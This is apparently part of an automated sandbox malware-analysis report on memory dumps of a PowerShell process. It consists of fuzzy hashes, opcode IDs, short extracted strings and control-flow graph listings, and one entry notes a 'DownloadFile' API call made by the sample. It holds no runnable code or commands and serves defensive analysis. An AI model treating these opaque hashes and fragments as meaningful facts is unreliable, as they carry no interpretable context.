                                                Similarity
                                                • API ID: DownloadFile
                                                • String ID:
                                                • API String ID: 1407266417-0
                                                • Opcode ID: 667be3356e4a04a95f122227f62cb908903ece1a1135747a3d9de9261457e6c4
                                                • Instruction ID: ca18da8e0803d4a5f53ce4b1317acf3b661402343c200ca65cf8cade75450696
                                                • Opcode Fuzzy Hash: 667be3356e4a04a95f122227f62cb908903ece1a1135747a3d9de9261457e6c4
                                                • Instruction Fuzzy Hash: 792137B5D0121ADFCB14CF9AD884BEEFBB4FB48310F108569E818A7210D374A954CBA0

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 269 78545f4-785463b 271 7854641-7854646 269->271 272 7854af2-7854b12 269->272 273 785465e-7854663 271->273 274 7854648-785464e 271->274 280 7854b14-7854b16 272->280 281 7854b1c-7854b1e 272->281 278 7854665-7854671 273->278 279 7854673 273->279 275 7854650 274->275 276 7854652-785465c 274->276 275->273 276->273 282 7854675-7854677 278->282 279->282 284 7854b1f-7854b25 280->284 285 7854b18-7854b1b 280->285 281->284 286 7854a93-7854a9d 282->286 287 785467d-7854687 282->287 290 7854b35 284->290 291 7854b27-7854b33 284->291 285->281 288 7854a9f-7854aa8 286->288 289 7854aab-7854ab1 286->289 287->272 292 785468d-7854692 287->292 296 7854ab7-7854ac3 289->296 297 7854ab3-7854ab5 289->297 293 7854b37-7854b39 290->293 291->293 294 7854694-785469a 292->294 295 78546aa-78546b8 292->295 301 7854b7b-7854b85 293->301 302 7854b3b-7854b42 293->302 299 785469c 294->299 300 785469e-78546a8 294->300 295->286 310 78546be-78546dd 295->310 298 7854ac5-7854aef 296->298 297->298 299->295 300->295 306 7854b87-7854b8b 301->306 307 7854b8e-7854b94 301->307 302->301 304 7854b44-7854b61 302->304 315 7854b63-7854b75 304->315 316 7854bc9-7854bce 304->316 311 7854b96-7854b98 307->311 312 7854b9a-7854ba6 307->312 310->286 324 78546e3-78546ed 310->324 314 7854ba8-7854bc6 311->314 312->314 315->301 316->315 324->272 325 78546f3-78546f8 324->325 326 7854710-7854714 325->326 327 78546fa-7854700 325->327 326->286 330 785471a-785471e 326->330 328 7854704-785470e 327->328 329 7854702 327->329 328->326 329->326 330->286 331 7854724-7854728 330->331 331->286 333 785472e-785473e 331->333 334 7854744-785476b 333->334 335 78547c6-7854815 333->335 340 7854785-78547b3 334->340 341 785476d-7854773 334->341 352 785481c-785482f 335->352 350 78547b5-78547b7 340->350 351 78547c1-78547c4 340->351 343 7854775 341->343 344 7854777-7854783 341->344 343->340 344->340 350->351 351->352 353 7854835-785485c 352->353 354 78548b7-7854906 352->354 359 7854876-78548a4 353->359 360 785485e-7854864 353->360 371 785490d-7854920 354->371 369 78548a6-78548a8 359->369 370 78548b2-78548b5 359->370 361 7854866 360->361 362 7854868-7854874 360->362 361->359 362->359 369->370 370->371 372 7854926-785494d 371->372 373 78549a8-78549f7 371->373 378 7854967-7854995 372->378 379 785494f-7854955 372->379 390 78549fe-7854a2c 373->390 388 7854997-7854999 378->388 389 78549a3-78549a6 378->389 380 7854957 379->380 381 7854959-7854965 379->381 380->378 381->378 388->389 389->390 395 7854a2f call 4be7a18 390->395 396 7854a2f call 4be7a08 390->396 397 7854a2f call 4be7c45 390->397 398 7854a2f call 4be1c00 390->398 393 7854a34-7854a90 395->393 396->393 397->393 398->393
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.1275805507.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_7850000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: tPq
                                                • API String ID: 0-789928099
                                                • Opcode ID: f4e6c48286b7c89076b8bc9e9b03bdc7beb8ffeadd12da1ebb0272d3d8f7acba
                                                • Instruction ID: cc70659743b31240bb9c765fb8fb18ed992829422ac93bf6e4e294e9b6f0a515
                                                • Opcode Fuzzy Hash: f4e6c48286b7c89076b8bc9e9b03bdc7beb8ffeadd12da1ebb0272d3d8f7acba
                                                • Instruction Fuzzy Hash: 9391D3B4A00246AFDB24CF59C441B69BBF2FB94710F288569ED09DB350DB72EC81CB94

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 597 7851ff5-7851fff 598 7852001 597->598 599 7852072-785207c 597->599 600 7852005-785200f 598->600 601 7852003 598->601 602 78520c2-78520f5 599->602 603 785207e-7852099 599->603 604 7852011-7852020 600->604 601->604 621 78520fc-7852105 602->621 609 78520b3-78520b7 603->609 610 785209b-78520a1 603->610 613 7852026-7852044 604->613 614 7852108-7852112 604->614 616 78520be-78520c0 609->616 611 78520a5-78520b1 610->611 612 78520a3 610->612 611->609 612->609 613->614 629 785204a-785206f 613->629 617 7852114-785211d 614->617 618 7852120-7852126 614->618 616->621 622 785212c-7852138 618->622 623 7852128-785212a 618->623 625 785213a-7852155 622->625 623->625 629->599 629->614
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.1275805507.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_7850000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 26b39d213cd3c577078003115285d86118562c5e7015d1623b9b87a8949ad495
                                                • Instruction ID: d1135cf5faba49cdf8ed4ee6eb71acec3359bedb3b99d633210ae87f16485a42
                                                • Opcode Fuzzy Hash: 26b39d213cd3c577078003115285d86118562c5e7015d1623b9b87a8949ad495
                                                • Instruction Fuzzy Hash: 5F312AF1B002508FEB1597754C10A6EBBA2BBE5214B1544BECA42CF282EE32DD51C7E6
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.1267163583.000000000322D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0322D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_322d000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 67aac669e3d07e48e11ea2be32948653cb9c6eece87190c54f21a93401b369b1
                                                • Instruction ID: e29cde7530cd34d6eea57a38ab649489c0a4c7765ca89173158c9f381893a277
                                                • Opcode Fuzzy Hash: 67aac669e3d07e48e11ea2be32948653cb9c6eece87190c54f21a93401b369b1
                                                • Instruction Fuzzy Hash: 98012D7144D3D06FD7128B258D94752BFA8DF47224F1984DBD8948F2A7C2685C85CB72
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.1267163583.000000000322D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0322D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_322d000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1b592a6d2e801458051e10a7a53f67c64cc45b1784c51cd3f423ccf1b2bc9bfc
                                                • Instruction ID: 782629ed528016477fbe49a2c6a75bc3ce2800bb4784adf6223fc8fddf81b51b
                                                • Opcode Fuzzy Hash: 1b592a6d2e801458051e10a7a53f67c64cc45b1784c51cd3f423ccf1b2bc9bfc
                                                • Instruction Fuzzy Hash: 0A01F731418711AEE720CA25CCC0767FF9CDF45360F18C05ADC684F292C6789982CAB1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.1275805507.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_7850000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'q$4'q$tPq$tPq$$q$$q$$q
                                                • API String ID: 0-2432477355
                                                • Opcode ID: b829f664441c5208b1d1bcd6fd42c46e4536752e1c43d8ed10606be067df7a93
                                                • Instruction ID: 2b4bbb5bc5c89dad84820912dc3f52411f90d88c64d6432c4d755a0ab2629307
                                                • Opcode Fuzzy Hash: b829f664441c5208b1d1bcd6fd42c46e4536752e1c43d8ed10606be067df7a93
                                                • Instruction Fuzzy Hash: F7F14BB5F0034A8FDB258F79840876ABBE6AFD6210F18817AC946CB241EF35DD45C792
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.1275805507.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_7850000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'q$4'q$4'q$4'q
                                                • API String ID: 0-4210068417
                                                • Opcode ID: b05aca760a169709af3e09d25775335825cc85fff7ce364d9d9756005b17e745
                                                • Instruction ID: b72818990362a5a4babbc450bf00614b9a7312b091090dfca27d3e1bae1ae2a1
• Opcode Fuzzy Hash: b05aca760a169709af3e09d25775335825cc85fff7ce364d9d9756005b17e745
• Instruction Fuzzy Hash: CED188F5B043468FD7148F79881076ABBE2BFE6210F18807AD945CB291EF35D942C792
Strings
Memory Dump Source
• Source File: 00000003.00000002.1275805507.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7850000_powershell.jbxd
Similarity
• API ID:
• String ID: $a9j$$a9j$tPq$tPq
• API String ID: 0-2061247602
• Opcode ID: 128d96d21397eb7849b41aa3ccec372a953c3695c989a7427a7d2ea11cea07d1
• Instruction ID: b9a90ce3358755dab421e9e4d0955ccfca7bf4177a9e2b7792913e2f3a507158
• Opcode Fuzzy Hash: 128d96d21397eb7849b41aa3ccec372a953c3695c989a7427a7d2ea11cea07d1
• Instruction Fuzzy Hash: 32B160B17043859FD7248F798800766BFE6EFD6220F18817AD949CF281EA75DC91C7A2
Strings
Memory Dump Source
• Source File: 00000003.00000002.1275805507.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7850000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'q$4'q$4'q$4'q
• API String ID: 0-4210068417
• Opcode ID: 1c1605cf4387d214066a9c363d115a178c6fd1fb010c420a341eb94594972e51
• Instruction ID: 0aef5e34b17173f61c890c27bb519d1f164bf2694018342bf95785f566027df8
• Opcode Fuzzy Hash: 1c1605cf4387d214066a9c363d115a178c6fd1fb010c420a341eb94594972e51
• Instruction Fuzzy Hash: 6A818AB0B0434ACFCB258F79C8147AABBF1AF96298F1880BBD845CB641DB35C951C791
Strings
Memory Dump Source
• Source File: 00000003.00000002.1275805507.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7850000_powershell.jbxd
Similarity
• API ID:
• String ID: $q$$q$$q$$q
• API String ID: 0-4102054182
• Opcode ID: afe71745ed83e8d28c3d07aab7ab674a9734bcf63696eaf2bb81dfe635f5e10e
• Instruction ID: eb65e983ccb216a63dd62680b57abf4192f6e727fdcb45325e4ad61b174548d7
• Opcode Fuzzy Hash: afe71745ed83e8d28c3d07aab7ab674a9734bcf63696eaf2bb81dfe635f5e10e
• Instruction Fuzzy Hash: DD217DF17003465BEB348A6A9800B27AED69BE179DF64813ED946CB7C5DD31C841C361
Strings
Memory Dump Source
• Source File: 00000003.00000002.1275805507.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7850000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'q$4'q$$q$$q
• API String ID: 0-3199993180
• Opcode ID: 504162f2b6d88a0dd539c92b63943e69a9fa3ef42c784fc639e6e1b6a6c318ee
• Instruction ID: 4200953b3c8e2729db98e3ba3a39cac6399592c879af257bb20d2b025f5d2542
• Opcode Fuzzy Hash: 504162f2b6d88a0dd539c92b63943e69a9fa3ef42c784fc639e6e1b6a6c318ee
• Instruction Fuzzy Hash: E33189A2A0E3C65FD72743350C216592F726FA3240B5A80EBC981CF1E3D9694C49C3A7